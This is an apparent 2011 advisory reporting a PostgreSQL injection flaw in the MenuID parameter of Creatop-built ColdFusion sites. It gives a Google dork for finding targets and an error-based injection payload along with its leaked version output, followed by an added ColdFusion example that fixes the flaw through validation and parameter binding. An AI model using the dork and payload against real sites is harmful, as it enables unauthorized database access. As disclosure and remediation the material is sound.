Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PostgreSQL Injection


Title : Creatop Web Design Vulnerable to PostgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm


PostgreSQL Injection
--------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.
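
The request above works because MenuID reaches the SQL text unvalidated and the raw database error is echoed back to the page. A hardened handler for that parameter follows as an added example; it is not Creatop's code or part of the original advisory, and the table, column and datasource names (menu, menu_id, title, siteDSN) are assumptions.

```cfml
<!--- Added example. Table, column and datasource names are hypothetical.

      Assumed vulnerable pattern: the URL value is spliced into the SQL text,
      so everything after "80" is parsed by PostgreSQL as part of the statement:

          SELECT menu_id, title FROM menu WHERE menu_id = [url.MenuID inserted here]
--->

<!--- 1. Give the parameter a default so a missing value is handled, not thrown. --->
<cfparam name="url.MenuID" default="">

<!--- 2. Accept only 1 to 9 decimal digits (always fits a 32-bit integer).
         Anything else, including "80 and 1=cast(...)", is rejected here. --->
<cfif NOT reFind("^[0-9]{1,9}$", url.MenuID)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfabort>
</cfif>

<cftry>
    <!--- 3. Bind the value as a typed parameter. The driver sends it separately
             from the SQL text, so it can never change the statement's structure. --->
    <cfquery name="qMenu" datasource="siteDSN">
        SELECT menu_id, title
        FROM menu
        WHERE menu_id = <cfqueryparam value="#url.MenuID#" cfsqltype="cf_sql_integer">
    </cfquery>

    <cfcatch type="database">
        <!--- 4. Keep the database error in the server log only. Returning it to the
                 client is what exposed the version string in the advisory. --->
        <cflog file="application" type="error" text="Menu lookup failed: #cfcatch.message#">
        <cfheader statuscode="500" statustext="Internal Server Error">
        <cfabort>
    </cfcatch>
</cftry>

<cfoutput query="qMenu">
    #encodeForHTML(qMenu.title)#
</cfoutput>
```

Either the digit check or the typed bind alone stops the request shown in the advisory; the cfcatch block removes the error channel that returned the version string.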